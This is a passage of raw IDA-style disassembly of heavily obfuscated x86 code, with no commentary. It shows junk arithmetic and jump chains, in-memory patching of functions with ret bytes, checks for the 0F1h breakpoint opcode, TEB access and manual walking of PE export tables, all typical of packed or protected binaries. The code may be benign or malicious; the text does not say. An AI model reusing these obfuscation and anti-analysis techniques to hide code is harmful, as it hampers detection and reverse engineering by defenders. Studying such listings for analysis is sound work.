loc_445C46: ; CODE XREF: sub_4473F5-1DE1j
jmp loc_45ABBC
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
push edx
pushf
jmp loc_44854E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_445C52: ; CODE XREF: sub_43A5C0:loc_43F9F8j
; sub_43FF65+12615j
call sub_457818
loc_445C57: ; CODE XREF: sub_44E688-C4FAj
jmp loc_44F459
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_445C5C: ; CODE XREF: sub_43CAF4-239Ej
jmp loc_43B6D6
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459935
loc_445C61: ; CODE XREF: sub_459935:loc_446567j
sub edx, 0B65BC668h
cmp edx, 5BE520C9h
jmp loc_44B710
; END OF FUNCTION CHUNK FOR sub_459935
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A8C1
loc_445C72: ; CODE XREF: sub_45A8C1-11156j
push 22CDB4A6h
add esi, 0A34FEC14h
sbb eax, ebp
loc_445C7F: ; CODE XREF: sub_45A8C1:loc_44975Dj
sub edx, 307F9F9Fh
push offset sub_44A9CB
jmp nullsub_535
; END OF FUNCTION CHUNK FOR sub_45A8C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_445C8F: ; CODE XREF: sub_439BF8+CE1Ej
; sub_439BF8:loc_44AAD9j
lea eax, [ebp-25Ch]
cmp dword ptr [eax], 47424454h
jnz loc_4484F2
jmp loc_43FF09
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456F4
loc_445CA6: ; CODE XREF: sub_4456F4:loc_458528j
pop edi
jmp loc_444477
; END OF FUNCTION CHUNK FOR sub_4456F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_445CAC: ; CODE XREF: sub_442B3B+65j
cdq
jmp loc_44AA03
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
locret_445CB2: ; CODE XREF: ut7h7i2x:0044423Fj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_445CB3: ; CODE XREF: sub_43A556:loc_43A55Bj
push 0
lea eax, [ebp-20h]
push ecx
push eax
pop ecx
xchg ecx, [esp+8+var_8]
jmp loc_444573
; END OF FUNCTION CHUNK FOR sub_43A556
; =============== S U B R O U T I N E =======================================
sub_445CC3 proc near ; DATA XREF: ut7h7i2x:0044F512o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00445570 SIZE 0000000F BYTES
xchg esi, [esp+0]
mov edx, esi
or esi, 5A00D098h
jmp loc_445570
sub_445CC3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_445CD3: ; CODE XREF: sub_43FF65:loc_44F459j
; sub_43FF65+F505j
xor esi, 61E311B9h
or esi, 4A9999BBh
push offset sub_456B6D
jmp loc_43A3CB
; END OF FUNCTION CHUNK FOR sub_43FF65
; =============== S U B R O U T I N E =======================================
sub_445CE9 proc near ; DATA XREF: sub_4561CA:loc_454EB4o
; FUNCTION CHUNK AT 0043A5A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449EBC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004502DA SIZE 00000005 BYTES
mov eax, [ebp-14h]
mov [ebp-4], eax
mov eax, [ebp-14h]
mov [ebp-0Ch], eax
jmp loc_43A5A4
sub_445CE9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457FD0
loc_445CFA: ; CODE XREF: sub_457FD0:loc_457FD8j
rol ebx, 0Fh
add ebx, 94F478FEh
mov [ebx], eax
pop ebx
lea eax, loc_43EFB4
mov byte ptr [eax], 0C3h
jmp loc_459F8D
; END OF FUNCTION CHUNK FOR sub_457FD0
; ---------------------------------------------------------------------------
sbb ebp, 66BEE27Dh
jmp sub_457453
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F071
loc_445D1F: ; CODE XREF: sub_43F071+1165Dj
sbb eax, 29F768CFh
; END OF FUNCTION CHUNK FOR sub_43F071
; =============== S U B R O U T I N E =======================================
sub_445D25 proc near ; CODE XREF: sub_44937E+9964p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044AB63 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004530F9 SIZE 0000001E BYTES
xchg ebx, [esp+0]
pop ebx
xchg ecx, [esp-4+arg_0]
call sub_45601B
jmp loc_44AB63
sub_445D25 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A4C0
loc_445D36: ; CODE XREF: sub_44A4C0+2229j
call sub_451EF2
pop eax
cmp dword ptr [eax], 0
jnz loc_44C6E0
jmp sub_44A4C0
; ---------------------------------------------------------------------------
loc_445D4A: ; CODE XREF: sub_44A4C0:loc_44C6E0j
push eax
push 0
call sub_451EF2
jmp loc_44AC36
; END OF FUNCTION CHUNK FOR sub_44A4C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A83C
loc_445D57: ; CODE XREF: sub_45A83C:loc_455F38j
sub eax, 0BC69D51Ch
or eax, 1D27CAB3h
and eax, 5AE87FBAh
rol eax, 7
xor eax, 7943E040h
jmp loc_43BAF8
; END OF FUNCTION CHUNK FOR sub_45A83C
; ---------------------------------------------------------------------------
loc_445D77: ; CODE XREF: ut7h7i2x:0044A5F8j
mov ecx, ds:dword_4487F0
jnb loc_44F1D2
or [ecx+edx], al
mov eax, [ebp-0Ch]
push eax
jmp loc_45630F
; ---------------------------------------------------------------------------
loc_445D8F: ; CODE XREF: ut7h7i2x:0044A82Ej
jz loc_4576B2
jmp loc_45971C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_445D9A: ; CODE XREF: sub_444029:loc_43D194j
push 0EC4C48A1h
pop eax
sub eax, 0FD1BA59Dh
jb loc_457795
and ebx, ebp
jmp loc_454B19
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
loc_445DB3: ; CODE XREF: ut7h7i2x:0044245Dj
popf
; =============== S U B R O U T I N E =======================================
sub_445DB4 proc near ; CODE XREF: sub_458C95-18D00p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044F827 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00450E82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045574B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D62 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045981F SIZE 0000000F BYTES
xchg edx, [esp+0]
pop edx
xchg eax, [esp-4+arg_0]
mov edx, eax
xchg edx, [esp-4+arg_0]
jns loc_44F838
jmp loc_450E82
sub_445DB4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_445DCB: ; CODE XREF: sub_442B3B-5F2Dj
cmp ecx, 17FEE565h
jmp loc_452704
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E65D
loc_445DD6: ; CODE XREF: sub_44E65D:loc_459EADj
sub al, 99h
push 497632DDh
pop edx
; END OF FUNCTION CHUNK FOR sub_44E65D
; START OF FUNCTION CHUNK FOR sub_45967C
loc_445DDE: ; CODE XREF: sub_45967C:loc_441A43j
and edx, 139DFCD4h
jmp loc_451D5C
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E361
loc_445DE9: ; CODE XREF: sub_44E361:loc_459BAEj
and edi, 46AF10DBh
add edi, 0C01C7A0Eh
xchg edi, [esp+0]
jmp loc_44F4EF
; END OF FUNCTION CHUNK FOR sub_44E361
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F66D
loc_445DFD: ; CODE XREF: sub_43F66D+10530j
jnz loc_44891E
mov ebx, ecx
mov [eax], ebp
pop edi
jmp loc_44891E
; END OF FUNCTION CHUNK FOR sub_43F66D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_397. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_445E0E: ; CODE XREF: sub_457A66-C194j
jmp loc_4467FE
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_445E13 proc near ; CODE XREF: sub_4460A2-B0B4p
; ut7h7i2x:0043E6B3j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00442AAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446EBF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D22B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455C6A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045821C SIZE 00000021 BYTES
xchg esi, [esp+0]
pop esi
or eax, eax
jnz loc_455C6A
jmp loc_442AAE
sub_445E13 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_445E24: ; CODE XREF: ut7h7i2x:00443EB7j
xor ebx, 86F3F84Eh
or ebx, 56348A56h
add ebx, 888C950Ch
xchg ebx, [esp]
jmp sub_43AED9
; ---------------------------------------------------------------------------
loc_445E3E: ; CODE XREF: ut7h7i2x:0043DA35j
jno loc_43E487
jg loc_455744
xchg ebp, ecx
jmp loc_4449A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_445E51: ; CODE XREF: sub_452D3D+3BE1j
xchg edi, [edx]
loc_445E53: ; CODE XREF: sub_4583C4:loc_43EE63j
push eax
lea eax, dword_444424
push edi
mov edi, 642F687Dh
jmp loc_4480F7
; END OF FUNCTION CHUNK FOR sub_452D3D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_199. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_445E66: ; CODE XREF: ut7h7i2x:loc_4429CDj
retn
; ---------------------------------------------------------------------------
loc_445E67: ; DATA XREF: ut7h7i2x:00455B6Eo
xchg ecx, [esp]
push ecx
pop edx
pop ecx
jmp loc_441313
; ---------------------------------------------------------------------------
js loc_4426D9
jmp sub_4444F0
; ---------------------------------------------------------------------------
loc_445E7D: ; DATA XREF: sub_450FDE:loc_448F7Ao
add eax, 0B7FB80BCh
push offset sub_4423AE
jmp loc_44F815
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_114. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_445E8E: ; CODE XREF: ut7h7i2x:00450598j
jmp locret_45ACDD
; ---------------------------------------------------------------------------
loc_445E93: ; CODE XREF: ut7h7i2x:00439364j
jmp locret_4505B5
; ---------------------------------------------------------------------------
loc_445E98: ; CODE XREF: ut7h7i2x:00452A49j
add ecx, 3FFFCEA3h
; =============== S U B R O U T I N E =======================================
sub_445E9E proc near ; CODE XREF: sub_444038+10p
; FUNCTION CHUNK AT 0043D097 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00440569 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044574A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044A13E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454D82 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00459D31 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045ACF0 SIZE 00000014 BYTES
xchg esi, [esp+0]
pop esi
pop edx
jmp loc_45ACF0
sub_445E9E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A08
loc_445EA8: ; CODE XREF: sub_444A08:loc_450CA5j
push offset sub_452AE2
jmp nullsub_245
; END OF FUNCTION CHUNK FOR sub_444A08
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_104. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F66D
loc_445EB3: ; CODE XREF: sub_43F66D+B282j
jmp nullsub_164
; END OF FUNCTION CHUNK FOR sub_43F66D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_445EB8: ; CODE XREF: sub_439BD1:loc_454151j
push eax
call sub_44865D
loc_445EBE: ; DATA XREF: sub_44E2AA-D78Do
mov ecx, [esp+8+arg_4]
mov dword ptr [ecx], 10001h
lea eax, sub_45A6A5
mov [ecx+0B8h], eax
jmp loc_454621
; END OF FUNCTION CHUNK FOR sub_439BD1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_265. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_445EDA proc near ; DATA XREF: sub_44A3BB:loc_4401E0o
; FUNCTION CHUNK AT 0043AB73 SIZE 00000010 BYTES
xor eax, 782F5F2Dh
call sub_4398BF
loc_445EE5: ; CODE XREF: ut7h7i2x:0045AD92j
jmp loc_43AB73
sub_445EDA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45601B
loc_445EEA: ; CODE XREF: sub_45601B+4738j
jmp nullsub_458
; END OF FUNCTION CHUNK FOR sub_45601B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4595BE
loc_445EEF: ; CODE XREF: sub_4595BE-112B7j
jmp nullsub_364
; END OF FUNCTION CHUNK FOR sub_4595BE
; ---------------------------------------------------------------------------
test ebp, eax
jmp loc_449859
; ---------------------------------------------------------------------------
sbb ecx, 0B7677055h
jmp loc_45669B
; ---------------------------------------------------------------------------
loc_445F06: ; DATA XREF: ut7h7i2x:00446336o
xchg eax, [esp]
mov ecx, eax
pop eax
and ecx, 874E563Fh
; START OF FUNCTION CHUNK FOR sub_43AE1A
loc_445F12: ; CODE XREF: sub_43AE1A+7825j
add ecx, 1A3C44D8h
rol ecx, 4
jmp loc_43A174
; END OF FUNCTION CHUNK FOR sub_43AE1A
; =============== S U B R O U T I N E =======================================
sub_445F20 proc near ; CODE XREF: ut7h7i2x:00443B11j
; sub_44978D+1DBCp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A9FD SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044242F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A9E0 SIZE 00000014 BYTES
xchg esi, [esp+0]
pop esi
push eax
push 58CBA81Bh
jmp loc_44A9E0
sub_445F20 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_42. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_445F30: ; CODE XREF: sub_43CCC3+Dj
jmp loc_44B3A9
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
loc_445F35: ; CODE XREF: ut7h7i2x:004571F8j
shl esi, 9
loc_445F38: ; CODE XREF: ut7h7i2x:loc_4571E3j
add ebx, 559868DAh
test ebx, 8000h
jmp loc_442AA3
; ---------------------------------------------------------------------------
loc_445F49: ; CODE XREF: ut7h7i2x:00459F94j
jl loc_4403B8
jl nullsub_181
; START OF FUNCTION CHUNK FOR sub_44C595
loc_445F55: ; CODE XREF: sub_44C595:loc_43A33Aj
add edi, 94B42AE6h
xchg edi, [esp+0]
jmp sub_453D8B
; END OF FUNCTION CHUNK FOR sub_44C595
; ---------------------------------------------------------------------------
mov ds:off_41D030, eax
lea eax, sub_43C39B
mov byte ptr [eax], 0C3h
jmp loc_4448CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C39B
loc_445F77: ; CODE XREF: sub_43C39B+1j
mov eax, [esp-4+arg_0]
push esi
jmp loc_44C5BF
; END OF FUNCTION CHUNK FOR sub_43C39B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_52. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_445F81: ; CODE XREF: sub_43B7F7+1C14Cj
jmp nullsub_305
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4588BA
loc_445F86: ; CODE XREF: sub_4588BA:loc_44887Ej
sub edx, 9C3D20A4h
xor edx, 875A47Bh
jnz loc_442600
; END OF FUNCTION CHUNK FOR sub_4588BA
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_445F98: ; CODE XREF: sub_43B7F7+B780j
jmp loc_44BEC1
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
loc_445F9D: ; CODE XREF: ut7h7i2x:0043D719j
jmp loc_439BCA
; ---------------------------------------------------------------------------
pop ebx
pushf
jmp loc_4425FE
; =============== S U B R O U T I N E =======================================
sub_445FA9 proc near ; CODE XREF: sub_444A08:loc_43C8BAp
; ut7h7i2x:0044D949j
var_8 = dword ptr -8
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00439DE0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043E7B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004406CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442328 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004463AD SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044714A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447D4B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044FAD4 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00450A9B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004517AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452622 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00455E1B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00458B4E SIZE 00000005 BYTES
xchg ebx, [esp+8+var_8]
pop ebx
pop ebx
js loc_44FAD4
jmp loc_4406CF
sub_445FA9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_445FB9: ; CODE XREF: ut7h7i2x:0045A536j
jge loc_43D929
; START OF FUNCTION CHUNK FOR sub_4589C7
loc_445FBF: ; CODE XREF: sub_4589C7:loc_43E9DDj
or edx, 7EE2E8AFh
add edx, 37A6BC3Ah
xor edx, ebx
push edi
pushf
push 42B4E0Bh
jmp loc_43FC12
; END OF FUNCTION CHUNK FOR sub_4589C7
; ---------------------------------------------------------------------------
loc_445FD9: ; DATA XREF: sub_43BDD6+120FFo
jb loc_446A7A
call sub_44D255
loc_445FE4: ; CODE XREF: ut7h7i2x:004572CAj
jle sub_4456C9
; =============== S U B R O U T I N E =======================================
sub_445FEA proc near ; CODE XREF: ut7h7i2x:00449269p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00449F22 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00456FCD SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
add eax, 0EB3BDC5Bh
loc_445FF4: ; DATA XREF: ut7h7i2x:0043ACFBo
push eax
mov eax, offset sub_45121C
jmp loc_456FCD
sub_445FEA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_445FFF: ; CODE XREF: ut7h7i2x:loc_44B957j
jz loc_4557F4
jmp loc_43F1D3
; =============== S U B R O U T I N E =======================================
sub_44600A proc near ; CODE XREF: sub_44339F:loc_44EE6Dj
push ebp
mov ebp, edx
call sub_448503
sub_44600A endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_45114D
loc_446012: ; CODE XREF: sub_45114D-7906j
jmp loc_448C54
; END OF FUNCTION CHUNK FOR sub_45114D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CDC
loc_446017: ; CODE XREF: sub_448CDC-8E22j
jmp loc_43DF0E
; END OF FUNCTION CHUNK FOR sub_448CDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458345
loc_44601C: ; CODE XREF: sub_458345-714Ej
jnz loc_43DB89
jmp loc_440F23
; END OF FUNCTION CHUNK FOR sub_458345
; ---------------------------------------------------------------------------
loc_446027: ; CODE XREF: ut7h7i2x:0044224Dj
ror eax, 0Fh
; =============== S U B R O U T I N E =======================================
sub_44602A proc near ; CODE XREF: sub_446B90+C613p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043AE03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C082 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043DA12 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043EBFD SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00442F84 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004433EA SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444393 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004458C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004470AE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447377 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00449447 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B386 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044F058 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F966 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045026A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00450B88 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045161C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452EF6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004538CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455C60 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004578F4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458450 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov eax, [ebp-4]
jmp loc_455C60
sub_44602A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450645
loc_446036: ; CODE XREF: sub_450645:loc_43AFBCj
and eax, 8D0FE864h
loc_44603C: ; CODE XREF: ut7h7i2x:0044EDC4j
add eax, 173D4EDBh
push offset loc_43B60A
jmp loc_448943
; END OF FUNCTION CHUNK FOR sub_450645
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2E0
loc_44604C: ; CODE XREF: sub_44E2E0:loc_452515j
jge loc_44E128
jmp loc_44567D
; END OF FUNCTION CHUNK FOR sub_44E2E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_446057: ; CODE XREF: sub_457A66-FD2Fj
jnb loc_459AA0
add ebx, edi
loc_44605F: ; CODE XREF: sub_457A66:loc_4491FDj
call sub_453D8B
mov edx, 4CB976E9h
call sub_44ED9F
jmp loc_443113
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_446073 proc near ; CODE XREF: sub_447917+6p
; ut7h7i2x:00450C9Fj
; FUNCTION CHUNK AT 0043B626 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445AF7 SIZE 00000010 BYTES
xchg ecx, [esp+0]
pop ecx
mov [ebp-8], edx
mov [ebp-4], eax
xor eax, eax
loc_44607F: ; CODE XREF: ut7h7i2x:loc_444D04j
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jmp loc_445AF7
sub_446073 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4543E9
loc_44608B: ; CODE XREF: sub_4543E9:loc_4585CBj
rol ecx, 18h
sub ecx, 4926BD3Eh
add ecx, 0DFEAC98Eh
xchg ecx, [esp+8+var_8]
jmp loc_446651
; END OF FUNCTION CHUNK FOR sub_4543E9
; =============== S U B R O U T I N E =======================================
sub_4460A2 proc near ; DATA XREF: sub_43D797+1319Do
; FUNCTION CHUNK AT 0043AFEC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00442CF7 SIZE 00000005 BYTES
push 9155614Dh
pop eax
or eax, 62183553h
rol eax, 14h
and eax, 5B568899h
add eax, 0AEEE8743h
jmp loc_442CF7
sub_4460A2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_325. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_4460C3: ; CODE XREF: sub_4402A5:loc_43EF49j
jnz loc_455480
jmp loc_4390AA
; END OF FUNCTION CHUNK FOR sub_4402A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_4460CE: ; CODE XREF: sub_44E6B4:loc_441C64j
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_446918
jmp loc_441EA8
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F57E
loc_4460DE: ; CODE XREF: sub_44F57E:loc_44F713j
push 313F8533h
pop ebx
xor ebx, 90F97D84h
rol ebx, 4
add ebx, 814956ABh
jmp loc_457883
; END OF FUNCTION CHUNK FOR sub_44F57E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_4460F8: ; CODE XREF: sub_449E96:loc_4515E8j
imul byte ptr [edx]
call sub_43AB62
; END OF FUNCTION CHUNK FOR sub_449E96
; START OF FUNCTION CHUNK FOR sub_440B68
loc_4460FF: ; CODE XREF: sub_440B68+9616j
jmp loc_455559
; END OF FUNCTION CHUNK FOR sub_440B68
; ---------------------------------------------------------------------------
loc_446104: ; CODE XREF: ut7h7i2x:0044D777j
pop ebx
add ebx, ds:4000FAh
sub ebx, 972BB56Ah
rol ebx, 0Bh
xor ebx, 0FC193F60h
add ebx, ebp
add ebx, 7960FAAAh
jmp loc_4426A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453790
loc_446127: ; CODE XREF: sub_453790:loc_440FF1j
sub ecx, 0BABF20AAh
push offset loc_440912
jmp loc_44B25B
; END OF FUNCTION CHUNK FOR sub_453790
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_446137: ; CODE XREF: sub_43CE34+8A7Dj
jnz loc_458C30
loc_44613D: ; CODE XREF: sub_43CE34:loc_4580D5j
mov eax, 63h
call sub_4448AF
jmp loc_443ACE
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
jmp loc_43CEE8
; =============== S U B R O U T I N E =======================================
sub_446151 proc near ; CODE XREF: sub_440AE3:loc_43AE8Dj
; sub_439D5C+155E6p
; FUNCTION CHUNK AT 0044EC07 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00455951 SIZE 00000005 BYTES
mov eax, large fs:18h
jmp loc_455951
sub_446151 endp
; =============== S U B R O U T I N E =======================================
sub_44615D proc near ; DATA XREF: sub_43F7A5+6CDo
; FUNCTION CHUNK AT 00439E4B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CDAD SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0043DF29 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A1BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A846 SIZE 0000000A BYTES
cmp byte ptr [eax], 0F1h
jnz loc_43CDAD
jmp loc_439E4B
sub_44615D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44616B: ; CODE XREF: ut7h7i2x:0043B8EDj
mov byte ptr [eax], 0C3h
jmp loc_44DF22
; ---------------------------------------------------------------------------
push esi
mov esi, eax
xchg esi, [esp]
push offset sub_4404F3
jmp loc_44AA3E
; ---------------------------------------------------------------------------
loc_446183: ; CODE XREF: ut7h7i2x:0044548Aj
xor esi, 32D2393Bh
cmp esi, 0D7DE122Bh
jmp loc_44FC80
; ---------------------------------------------------------------------------
loc_446194: ; CODE XREF: ut7h7i2x:004456A9j
sub ecx, eax
not ecx
cmp edi, ecx
jmp loc_439BA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_44619F: ; CODE XREF: sub_444273+D7DAj
jb loc_44F5EF
; END OF FUNCTION CHUNK FOR sub_444273
; START OF FUNCTION CHUNK FOR sub_449231
loc_4461A5: ; CODE XREF: sub_449231+496Fj
jmp loc_455F9D
; END OF FUNCTION CHUNK FOR sub_449231
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449EE1
loc_4461AA: ; CODE XREF: sub_449EE1+Dj
jmp loc_443C2D
; END OF FUNCTION CHUNK FOR sub_449EE1
; ---------------------------------------------------------------------------
test ebp, ecx
jmp loc_4492D2
; ---------------------------------------------------------------------------
push esi
jmp loc_43ADDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4461BC: ; CODE XREF: sub_439BF8:loc_43B50Ej
sub esi, 746EA435h
jmp loc_43E851
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449217
loc_4461C7: ; CODE XREF: sub_449217:loc_458A6Cj
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_44774B
jmp loc_43A200
; END OF FUNCTION CHUNK FOR sub_449217
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_4461DB: ; CODE XREF: sub_4529E0+615Bj
pop esi
rol eax, 1Bh
add eax, 0A4218907h
and eax, ds:4000F0h
